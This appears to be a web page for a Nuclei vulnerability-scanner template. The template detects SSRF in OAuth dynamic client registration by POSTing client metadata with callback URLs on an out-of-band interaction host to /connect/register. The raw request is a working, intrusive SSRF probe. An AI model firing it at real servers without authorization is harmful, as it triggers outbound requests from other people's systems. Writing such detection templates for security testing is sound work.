SSRF due to misconfiguration in OAuth

ID: ssrf-via-oauth-misconfig

Severity: medium

Author: KabirSuda

Tags: misconfig,oast,oauth,ssrf,intrusive

Description

Sends a POST request with the endpoint “/connect/register” to check external Interaction with multiple POST parameters.

YAML Source

id: ssrf-via-oauth-misconfig

info:
  name: SSRF due to misconfiguration in OAuth
  author: KabirSuda
  severity: medium
  description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
  reference:
    - https://portswigger.net/research/hidden-oauth-attack-vectors
  metadata:
    max-request: 1
  tags: misconfig,oast,oauth,ssrf,intrusive

http:
  - raw:
      - |
        POST /connect/register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Language: en-US,en;q=0.9

        {
          "application_type": "web",
          "redirect_uris": ["https://{{interactsh-url}}/callback"],
          "client_name": "{{Hostname}}",
          "logo_uri": "https://{{interactsh-url}}/favicon.ico",
          "subject_type": "pairwise",
          "token_endpoint_auth_method": "client_secret_basic",
          "request_uris": ["https://{{interactsh-url}}"]
        }

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 4b0a0048304602210082e94920c361d66f1a247e0363b9ae814c7d22722788f99c484028ed556737030221008332829c4b42547cfbaf62236ecf6a3ad85de6eec4ac913b57435c501b73911e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/misconfiguration/ssrf-via-oauth-misconfig.yaml"

View on Github